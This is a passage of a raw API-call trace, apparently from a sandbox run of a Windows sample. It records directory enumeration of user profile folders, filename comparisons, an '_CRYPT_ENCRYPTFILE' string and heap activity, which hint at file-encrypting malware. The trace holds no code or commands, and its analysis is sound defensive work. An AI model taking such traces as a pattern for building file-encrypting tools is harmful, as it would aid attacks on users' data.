lpMsg=0x8cf618) returned 0 [0242.637] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.637] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.637] FindNextFileW (in: hFindFile=0xa87690, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdf9e1b08, ftCreationTime.dwHighDateTime=0x1d32734, ftLastAccessTime.dwLowDateTime=0xd2f40fba, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xdf9e1b08, ftLastWriteTime.dwHighDateTime=0x1d32734, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PeerDistRepub", cAlternateFileName="PEERDI~1")) returned 1 [0242.637] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.637] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.637] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.637] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.637] FindNextFileW (in: hFindFile=0xa87690, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3e09841, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2f421af, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe3e09841, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Publishers", cAlternateFileName="PUBLIS~1")) returned 1 [0242.638] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.638] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.638] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.638] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.638] FindNextFileW (in: hFindFile=0xa87690, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb6f6a4d1, ftCreationTime.dwHighDateTime=0x1d5d815, ftLastAccessTime.dwLowDateTime=0xb6f6a4d1, ftLastAccessTime.dwHighDateTime=0x1d5d815, ftLastWriteTime.dwLowDateTime=0xb6f6a4d1, ftLastWriteTime.dwHighDateTime=0x1d5d815, nFileSizeHigh=0x0, nFileSizeLow=0x1db5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Resmon.ResmonCfg", cAlternateFileName="RESMON~1.RES")) returned 1 [0242.638] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.638] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.638] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.638] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.638] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.638] FindNextFileW (in: hFindFile=0xa87690, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xede07765, ftLastAccessTime.dwHighDateTime=0x1d67c7d, ftLastWriteTime.dwLowDateTime=0xede07765, ftLastWriteTime.dwHighDateTime=0x1d67c7d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0242.638] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.638] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.638] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.639] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.639] FindNextFileW (in: hFindFile=0xa87690, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temporary Internet Files", cAlternateFileName="TEMPOR~1")) returned 1 [0242.639] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.639] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.639] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.639] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.639] FindNextFileW (in: hFindFile=0xa87690, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cdbf8a7, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd2fbd0ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3cdbf8a7, ftLastWriteTime.dwHighDateTime=0x1d32722, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TileDataLayer", cAlternateFileName="TILEDA~1")) returned 1 [0242.639] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.639] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.639] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.639] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.639] FindNextFileW (in: hFindFile=0xa87690, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf56c97e4, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xd3023f2d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf56c97e4, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UNP", cAlternateFileName="")) returned 1 [0242.639] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.640] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.640] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.640] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.640] FindNextFileW (in: hFindFile=0xa87690, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6a795684, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd3024d82, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x6a795684, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VirtualStore", cAlternateFileName="VIRTUA~1")) returned 1 [0242.640] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.640] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.640] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.640] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.640] FindNextFileW (in: hFindFile=0xa87690, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="踚@锴\x97\x8c蘔J㳻@腸J\x8c\x8c㵶@\x8c\x8c藴Ja")) returned 0 [0242.640] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.640] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.640] FindClose (in: hFindFile=0xa87690 | out: hFindFile=0xa87690) returned 1 [0242.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0242.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0242.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0242.641] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.641] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.642] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0242.642] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0242.643] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0242.643] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IconCache.db", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0242.643] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="conCache.db", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0242.643] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="onCache.db", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0242.643] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nCache.db", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0242.643] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Cache.db", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0242.643] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ache.db", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0242.643] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="che.db", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0242.643] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="he.db", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0242.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0242.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0242.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0242.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0242.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0242.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0242.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0242.643] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0242.643] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IconCache.db", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0242.643] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="conCache.db", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0242.643] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="onCache.db", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0242.643] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nCache.db", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0242.644] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Cache.db", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0242.644] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ache.db", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0242.644] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="che.db", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0242.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0242.644] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0242.644] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0242.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04690 | out: hHeap=0x970000) returned 1 [0242.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0242.644] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0242.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0242.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0242.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0242.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0242.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0242.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0242.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e58910 [0242.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0242.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0242.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0242.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0242.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0242.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0242.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0242.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0242.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0242.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b38 [0242.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0242.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0242.645] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0242.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0242.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0242.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0242.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0242.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0242.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0242.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x978490 [0242.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0242.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0242.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0242.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0242.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0242.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0242.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0242.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cb8 [0242.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0242.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0242.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0242.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0242.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ba8 [0242.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0242.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0242.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0242.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50a58 [0242.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0242.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0242.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0242.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0242.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54710 [0242.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0242.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0242.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545a8 [0242.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0242.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0242.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0242.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04348 [0242.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0242.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0242.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547b0 [0242.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0242.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0242.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0242.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545d0 [0242.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0242.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0242.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546c0 [0242.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0242.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0242.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0242.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0242.647] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0242.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0242.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0242.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0242.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0242.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0242.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54788 [0242.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0242.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0242.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0242.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0242.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0242.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547d8 [0242.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0242.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0242.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0242.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0242.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54800 [0242.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0242.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0242.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0242.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546e8 [0242.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0242.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0242.648] HeapFree (in: hHeap=0x970000, 